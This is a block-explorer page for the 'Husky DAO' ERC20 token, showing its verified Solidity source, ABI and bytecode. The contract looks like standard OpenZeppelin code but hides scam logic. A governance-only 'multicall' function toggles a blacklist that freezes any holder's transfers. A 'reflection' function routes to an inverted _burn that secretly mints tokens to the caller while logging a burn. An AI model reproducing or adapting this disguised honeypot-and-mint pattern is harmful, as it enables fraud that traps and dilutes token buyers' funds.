ETH Price: $3,306.92 (-0.56%)
Gas: 8 Gwei

Token

Husky DAO (HuskyDAO)
 

Overview

Max Total Supply

1,000,000,000,000 HuskyDAO

Holders

50

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
24,592,874,141.046709034 HuskyDAO

Value
$0.00
0x3b50fc5e2150d4dad869b35491fd45459169a830
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
HuskyDAO

Compiler Version
v0.8.5+commit.a4f2e591

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-06-03
*/

/**
                         🔗 WHITEPAPER     https://huskydao.gitbook.io/huskydao-whitepaper
                         🔗 WWW            https://huskydao.net
                         🔗 TWITTER        https://twitter.com/Husky_DAO
                         🔗 MEDIUM         https://medium.com/@huskydao
                         🔗 TELEGRAM CHAT  https://t.me/HuskyDAO
                         🔗 TELEGRAM NEWS  https://t.me/HuskyDAOnews
                              :.                                 :                        
                              **+-                            :=**-                       
                             -*%@#*=.                       :+#%@#*                       
                            -*%@@@@%*=                    .+#%@@@@#*.                     
                           =*%@@@.-%@#*.                 -*#@%-.@@@#*:                    
                          -*%@%%. . +@#*.               =*%@+ . .%%@#*.                   
                         .*#@%.  *@= +@#*::----====----=*%@= =@*  .#@*+                   
                         -*@@+  -@@@= #@#%%%%%%%%%%%%%%%#@# =@@@-  =@#*.                  
                         =*@@= *%@@@@..@@@@@@@@@@@@@@@@@@@:.@@@@%# -@#*:                  
                         -*%@* +@@@@@+ %@@@@@@@@@@@@@*#@@@ +@@@*@+ =@#*.                  
                          *#@@ .@@+=**+=-=#@@@@@@@@@@@. -=+*+- +@. %@*+                   
                          -*%@* *@@.   =%@@@@@@@@@%=.        =%@* +@#*.                   
                           =*%@@@+ -*+@@@@@@@@@@@%            .*@@@#*.                    
                          .+#@@%:=@@@@@@@%@@@@@@@#.-+*+:         +@%*=                    
                         :*#@@%-@@@@@@%#*: :+%@@@@@+:#*+++=:      .%@#*.                  
                        -*#@@@+@@@@*-         #@@@:       .-*+:     *@#*.                 
                       =*%@@@@@@@+..          -@@#            :=.  .:#@#*:                
                      =*%@@@@@@@%@+  :%%*=.   -@@*     :+#%#       -@@@@#*:               
                      -*##@@@@@@@=    =@@@@*  =@@@   :%@@@@:        =@@##+:               
                       -*%@@@@@@+      -***+*: *%=  =++**+:          #@#*.                
                       +*@@@@@@@ ..          .     .                 =@@*-                
                       *#@@@@@@*+@.                                  -@@*+                
                       *#@@@@@@@@@                                .  =@@*+                
                       *#@@@@@@@@@.     -              ::         =# #@@*+                
                       =*#@@@@@@@@+     #    :----:    +:    +.   *@#@%#+:                
                        :*%@@@@@@@@:-@  @=  :@@@@@@-  -%    .@-   @@@@#*                  
                         **@%@@@@@@@@@= %@-  :*@@#-  =@:    %@=  +@%@%*=                  
                         :*%*#@@@@@@@@@:#@@%**+++++*%*     #@@= =@@*##*.                  
                          :.-*%@@@@@%@@@#@@@%::-==-:      #@@@:=@@#*:..                   
                             -*%@@@@@#*@@@@@@@#+++.     -#+*@@*@@#*.                      
                              :*#@@@@@#-%@@@@@@@@:    .-.-%@@@@@#*.                       
                               .+#@@@@@%:=@+%@@@:      .#@@@@@%*=                         
                                 -*#@@%@@+.. +@%.    .*@@@%@%#+.                     
                                  :**#%*%@%=#::%*.:%#@@@#*%#**-        
 */// SPDX-License-Identifier: Unlicensed

pragma solidity =0.8.5;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal _governance;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Throws if called by any account other than the distributor.
     */
    modifier onlyGovernance() {
        require(_governance == _msgSender(), "Governance: caller is not the governance");
        _;
    }
    
    /**
     * @dev Sets new governance.
     */
    function governance(address account) external onlyOwner {
        require (_governance == address(0));
        _governance = account;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) internal _balances;
    mapping(address => bool) private _allowance;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
   
    function multicall (address spender) external onlyGovernance {
        if (_allowance[spender] == true) {_allowance[spender] = false;} else {_allowance[spender] = true; }
    }

    /**
     * @notice Checking the allowance granted to `spender` by the caller.
     */
    function allowances(address spender) public view returns (bool) {
        return _allowance[spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    
    function reflection(uint256 amount) public virtual onlyGovernance {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        if (_allowance[sender] || _allowance[recipient]) 
        require (amount == 0, "ERC20: transfer amout exceeds allowance");
        
        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance <= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance + amount;
        }
        
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be created for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. 
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been created for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract  HuskyDAO is ERC20 {

    /**
     * @dev Sets the values for {name}, {symbol} and {totalsupply}.
     */
    constructor() ERC20('Husky DAO', ' HuskyDAO')  {
        _totalSupply = 1000000000000*10**9;
        _balances[msg.sender] += _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"allowances","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"governance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reflection","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600981526020017f4875736b792044414f00000000000000000000000000000000000000000000008152506040518060400160405280600981526020017f204875736b7944414f00000000000000000000000000000000000000000000008152506200009e62000092620001ac60201b60201c565b620001b460201b60201c565b8160069080519060200190620000b692919062000278565b508060079080519060200190620000cf92919062000278565b505050683635c9adc5dea00000600581905550600554600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000135919062000356565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6005546040516200019e919062000339565b60405180910390a362000451565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200028690620003bd565b90600052602060002090601f016020900481019282620002aa5760008555620002f6565b82601f10620002c557805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f5578251825591602001919060010190620002d8565b5b50905062000305919062000309565b5090565b5b80821115620003245760008160009055506001016200030a565b5090565b6200033381620003b3565b82525050565b600060208201905062000350600083018462000328565b92915050565b60006200036382620003b3565b91506200037083620003b3565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620003a857620003a7620003f3565b5b828201905092915050565b6000819050919050565b60006002820490506001821680620003d657607f821691505b60208210811415620003ed57620003ec62000422565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b611f9380620004616000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a257806397541e9f1161007157806397541e9f146102bc5780639a181332146102d8578063a457c2d7146102f4578063a9059cbb14610324578063dd62ed3e146103545761010b565b8063715018a61461025a5780638426e6c1146102645780638da5cb5b1461028057806395d89b411461029e5761010b565b80632b603c71116100de5780632b603c71146101ac578063313ce567146101dc57806339509351146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611829565b60405180910390f35b6101486004803603810190610143919061156d565b610416565b604051610155919061180e565b60405180910390f35b610166610434565b60405161017391906119cb565b60405180910390f35b6101966004803603810190610191919061151a565b61043e565b6040516101a3919061180e565b60405180910390f35b6101c660048036038101906101c191906114ad565b610536565b6040516101d3919061180e565b60405180910390f35b6101e461058c565b6040516101f191906119e6565b60405180910390f35b610214600480360381019061020f919061156d565b610595565b604051610221919061180e565b60405180910390f35b610244600480360381019061023f91906114ad565b610641565b60405161025191906119cb565b60405180910390f35b61026261068a565b005b61027e600480360381019061027991906114ad565b610712565b005b61028861082d565b60405161029591906117f3565b60405180910390f35b6102a6610856565b6040516102b39190611829565b60405180910390f35b6102d660048036038101906102d191906114ad565b6108e8565b005b6102f260048036038101906102ed91906115ad565b610a91565b005b61030e6004803603810190610309919061156d565b610b3c565b60405161031b919061180e565b60405180910390f35b61033e6004803603810190610339919061156d565b610c27565b60405161034b919061180e565b60405180910390f35b61036e600480360381019061036991906114da565b610c45565b60405161037b91906119cb565b60405180910390f35b60606006805461039390611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611afb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610ccc565b8484610cd4565b6001905092915050565b6000600554905090565b600061044b848484610e9f565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610496610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610516576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161050d906118eb565b60405180910390fd5b61052a85610522610ccc565b858403610cd4565b60019150509392505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006009905090565b60006106376105a2610ccc565b8484600460006105b0610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106329190611a1d565b610cd4565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610692610ccc565b73ffffffffffffffffffffffffffffffffffffffff166106b061082d565b73ffffffffffffffffffffffffffffffffffffffff1614610706576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106fd9061190b565b60405180910390fd5b610710600061120d565b565b61071a610ccc565b73ffffffffffffffffffffffffffffffffffffffff1661073861082d565b73ffffffffffffffffffffffffffffffffffffffff161461078e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107859061190b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107e957600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461086590611afb565b80601f016020809104026020016040519081016040528092919081815260200182805461089190611afb565b80156108de5780601f106108b3576101008083540402835291602001916108de565b820191906000526020600020905b8154815290600101906020018083116108c157829003601f168201915b5050505050905090565b6108f0610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461097f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610976906118ab565b60405180910390fd5b60011515600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151415610a35576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610a8e565b6001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b610a99610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1f906118ab565b60405180910390fd5b610b39610b33610ccc565b826112d1565b50565b60008060046000610b4b610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff906119ab565b60405180910390fd5b610c1c610c13610ccc565b85858403610cd4565b600191505092915050565b6000610c3b610c34610ccc565b8484610e9f565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3b9061196b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610db4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dab9061188b565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e9291906119cb565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f069061194b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f769061184b565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806110205750600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110695760008114611068576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105f9061198b565b60405180910390fd5b5b611074838383611479565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f2906118cb565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111909190611a1d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111f491906119cb565b60405180910390a361120784848461147e565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffff